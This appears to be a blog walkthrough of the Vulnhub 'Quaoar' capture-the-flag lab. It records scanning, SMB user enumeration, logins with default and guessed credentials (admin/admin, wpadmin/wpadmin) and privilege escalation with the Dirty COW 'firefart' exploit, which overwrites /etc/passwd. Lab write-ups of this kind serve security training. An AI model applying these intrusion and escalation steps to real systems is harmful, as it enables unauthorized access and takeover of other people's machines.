Vulnhub Quaoar Walkthrough

Below you’ll find my results from the Vulnhub Quaoar machine, found here. There are a few ways to root this…here’s what I did initially.

First – NMAP Discovery (yes, I cheated and got the IP from my DHCP server…)

nmap -sS -sV -p-

Starting Nmap 7.60 ( ) at 2017-10-28 23:37 EDT

Nmap scan report for
Host is up (0.030s latency).
Not shown: 65526 closed ports
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see 80 open, so let’s check for low hanging fruit here…

root@kali:~# curl
Disallow: Hackers
Allow: /wordpress/
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|

Ok…there may be a WP install, let’s check it out.

root@kali:~# curl | html2text 
****** Quaoar ******
 Primary Menu Skip_to_content
    * Sample_Page
 Search for: [Unknown INPUT type]  [Search]

****** What_is_Quaoar? ******
October_22,_2016 admin

****** Hello_world! ******
October_12,_2016 admin
Welcome to WordPress. This is your first post. Edit or delete it, then start
***** Just another WordPress site *****
 Search for: [Unknown INPUT type]  [Search]
****** Recent Posts ******
    * What_is_Quaoar?
    * Hello_world!
****** Recent Comments ******
****** Archives ******
    * October_2016
****** Categories ******
    * Uncategorized
****** Meta ******
    * Log_in
    * Entries_RSS
    * Comments_RSS

Go to …/wp-admin, and try the obvious combinations of usernames and passwords, and low and behold, we’re successful. (admin/admin)

WordPress admin access

Let’s make a note of that for now, and check a few other things. Since we saw 139 and 445 open, let’s check that out.

root@kali:~# enum4linux
Starting enum4linux v0.8.9 ( ) on Sun Oct 29 08:53:32 2017

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: WORKGROUP

|    Nbtstat Information for    |
Looking up status of
  QUAOAR          <00> -         B <ACTIVE>  Workstation Service
  QUAOAR          <03> -         B <ACTIVE>  Messenger Service
  QUAOAR          <20> -         B <ACTIVE>  File Server Service
  ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
  WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
  WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
  WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

  MAC Address = 00-00-00-00-00-00

|    Session Check on    |
[+] Server allows sessions using username '', password ''

|    Getting domain SID for    |
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

|    OS information on    |
Use of uninitialized value $os_info in concatenation (.) or string at ./ line 464.
[+] Got OS info for from smbclient: 
[+] Got OS info for from srvinfo:
  QUAOAR         Wk Sv PrQ Unx NT SNT Quaoar server (Samba, Ubuntu)
  platform_id     :	500
  os version      :	4.9
  server type     :	0x809a03

|    Users on    |
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: 
index: 0x2 RID: 0x3e8 acb: 0x00000010 Account: viper	Name: viper	Desc: 
index: 0x3 RID: 0x3ea acb: 0x00000010 Account: wpadmin	Name: 	Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: root	Name: root	Desc: 

user:[nobody] rid:[0x1f5]
user:[viper] rid:[0x3e8]
user:[wpadmin] rid:[0x3ea]
user:[root] rid:[0x3e9]


Interesting…there’s a local user “wpadmin” Since the WP install was using admin/admin, let’s see if wpadmin might be using something similar. (wpadmin/wpadmin)

root@kali:~# ssh wpadmin@
wpadmin@'s password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:

  System information as of Sun Oct 29 08:58:06 EDT 2017

Success! Let’s check some basics…and find our flag.

$ echo $SHELL
$ pwd
$ ls -lahS
total 12K
drwxr-xr-x 2 root root    4.0K Oct 22  2016 .
drwxr-xr-x 3 root root    4.0K Oct 24  2016 ..
-rw-r--r-- 1 wpadmin  wpadmin   33 Oct 22  2016 flag.txt
$ cat flag.txt

Now here’s where you could go a couple of different directions. For better or worse, I went for the quick and easy win, and it worked.

Check the kernel version…

$ uname -a
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux

With the OSCP labs still fresh in my mind, I know there are several vulnerabilities that affect this kernel. One of those being “dirtycow,” and a derivative “firefart.” Not the best options if you’re going for stealth of course, but in this case, we’re not focused on that.

On our target machine, we check to see if gcc is installed, which it is not. We then copy the exploit to our Kali machine, and compile it there. Since we have ssh access onto the target, we can scp the file over. Note – /home/wpadmin was owned by root and the wpadmin user had no write access to it…so we save the exploit to /tmp.

$ gcc -v
-sh: 15: gcc: not found

root@kali:~# gcc -pthread dirty.c -o dirty -lcrypt -m32
root@kali:~# scp dirty wpadmin@
wpadmin@'s password: 
dirty                                                                                                   100%   12KB   2.4MB/s   00:00 

On our target, we make the file executable and run it.

$ chmod +x dirty
$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:

mmap: b77bb000

madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.

DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Then we can log in to the target using our newly created “firefart” account.

root@kali:~# ssh firefart@
firefart@'s password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:

  System information as of Sun Oct 29 09:23:56 EDT 2017

firefart@Quaoar:~# cd /root
firefart@Quaoar:~# ls
flag.txt vmware-tools-distrib
firefart@Quaoar:~# cat flag.txt 

Admittedly, I did not find the 3rd flag. However, there is a good write up here: which also provides some good advice on why to check cron jobs…in this case, because the 3rd flag was there!

Nicely done, k0ncepts.